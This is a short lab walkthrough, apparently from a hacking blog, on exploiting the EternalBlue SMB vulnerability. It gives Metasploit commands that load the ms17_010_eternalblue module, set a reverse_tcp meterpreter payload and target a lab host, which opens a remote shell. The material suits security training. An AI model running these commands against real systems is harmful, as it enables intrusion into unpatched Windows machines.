Eternalblue is a very critical exploit which was developed by NSA and was leaked by a hacker group called shadow brokers, In 2017 this vulnerability brought a worldwide chaos wannacry ransomware which hacked the world used this vulnerability to exploit windows machines. So today I’m going to play with this vulnerability and exploit it several ways.

Exploit eternalblue using metesploit

metesploit contain an exploit for this vulnerability lets use it,

use windows/smb/ms17_010_eternalblue

lets add the payload,

set payload windows/x64/meterpreter/reverse_tcp

Add LHOST and RHOSTS,

set LHOST tun0
set RHOSTS 10.10.10.40

now run the exploit and get the shell,</br> eternalblue with msf